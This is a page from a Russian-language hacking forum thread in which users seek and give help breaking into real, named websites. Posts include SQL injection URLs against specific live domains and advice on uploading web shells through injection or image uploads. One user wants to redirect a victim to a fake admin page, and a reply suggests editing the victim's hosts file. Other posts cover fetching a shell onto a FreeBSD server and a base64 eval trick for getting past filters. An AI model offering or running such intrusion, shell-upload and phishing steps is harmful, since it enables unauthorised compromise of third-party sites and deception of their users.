Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    175
    Likes Received:
    250
    Reputations:
    27
    недоступен
    кста, помогите добиться ошибки тут http://sfokr.ru
    нужен путь
     
    #16501 A_n_d_r_e_i, 29 Mar 2011
    Last edited: 29 Mar 2011
  2. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Есть у меня данные wp-settings.php

    define('DB_NAME', 'name');

    /** MySQL database username */
    define('DB_USER', 'username');

    /** MySQL database password */
    define('DB_PASSWORD', 'pass');

    /** MySQL hostname */
    define('DB_HOST', 'localhost');

    каким образом можно подключится, если например я не нашел путь к phpmyadmin
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    никак..ну или с сайта на том же хосте...имею в виду шелл или пыху
     
  4. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    что значит? как обойти?
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    В скрипте неверный путь указан. Скорей всего сайт был на *nix хостинге, а потом его перенесли на винду.
    Обойти можно только если:

    1. в админке можно редактировать путь заливки файлов. Шансы стремятся к нулю :D
    2. если путь определяется переменной, то узнать ее и попытаться передать ее в POST\GET\COOKIE запросе(при register globals on :D ). Шансы минимальны.
    3. попробовать изменить запрос так, чтоб файл вышел на несколько папок ниже. Более вероятно.
     
    #16505 попугай, 30 Mar 2011
    Last edited: 30 Mar 2011
  6. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Возможно ли обойти данную конструкцию?
    $get=preg_replace("/[^0-9a-zA-Z]/","",$_GET['id']);
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    172
    Reputations:
    75
    добрый день подскажыте пожалуйста как залить шелл через скулю
    http://encycl.anthropology.ru/article.php?id=999999+union+select+1,2,3,4,5,6,7,8,9,10
     
  8. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Нельзя, кавычки (') фильтруются, читай SQL Injection Полный FAQ
     
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Я через картинку заливал.
     
  10. SMerCH47

    SMerCH47 New Member

    Joined:
    5 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Вопрос:
    Можно ли как нибудь сделать чтобы жертва заходя на адрес
    www.sait.ru/admin попадала на фэйк к примеру salt.ru/admin , Либо в www.sait.ru/admin открывался фрэйм фэйка, Доступ к компу жертвы есть но неполноценный.

    портал xss-уязвим, но не факт что в момент доступа к компу сохраниться куки.
     
  11. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,028
    Likes Received:
    307
    Reputations:
    86
    Насколько доступ "неполный"?

    Если можешь заливать/править файлы, подними фейк на дедике с белым IP и кинь жертве в хостс соответствующую запись, после ребута он попадет на фейк при заходе.

    Лучше всего протесть все у себя для начала.
    Любой другой инсталлер (модули, мамботы и т.д.), шаблоны, менеджер языков.
    Если все не канает, пробуй залиться через какой-либо из установленных компонентов, если есть аплоад, пробуй заливаться всюду, где он есть.
     
    _________________________
  12. SMerCH47

    SMerCH47 New Member

    Joined:
    5 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Доступ у стороннего человека, может вставить флэшку не на долгое время.. если бы я был уверен что в куки храниться то все можно было бы решить по средствам xss и соц. инженерии..

    "подними фейк на дедике с белым IP и кинь жертве в хостс" - расшифруй это..я не хацкер, я простой юзер -)

    Еще есть мысль Батником отредактировать закладки если сайт в них есть
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Помогите разобраться с синтаксисом. Сервер под FreeBSD, как правильно составить команду, чтобы залить шелл?

    rcp -p /usr/local/www/httpdocs/shell.php http://site.ru/shell.php
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274

    wget, get, curl,fetch,lynx
     
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Это FreeBSD и установлены:

    /usr/bin/fetch
    /bin/rcp
    /bin/cp
    /usr/bin/scp
     
    #16515 FlaktW, 2 Apr 2011
    Last edited: 2 Apr 2011
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите вывести БД.

    http://skazka.nsk.ru/trick.29/id,40'/
     
  17. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    При заходе на шелл пустая страница. Как быть? .htaccess нет возможности переписать.
     
  18. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    1. Может быть антивирус, попробуй другой шелл.
    2. Может быть нет интерпритации php\или она отключена => попробуй perl\python шелл.

    Попробуй <?php echo 'qwe'; ?> . Если не выводит, то проблема в PHP.
     
  19. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    На перле залил шелл акцесс денайд.
    >>><?php echo 'qwe'; ?> выводит
    >>><?php info(); ?> не выводит
    Как же обойти?
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    Lijzer

    смотря конечно же что конкретно фильтруется

    <? eval(base64_decode('cGhwaW5mbygpOw==')); ?>
     
    _________________________
    #16520 Konqi, 3 Apr 2011
    Last edited: 3 Apr 2011
Loading...
Thread Status:
Not open for further replies.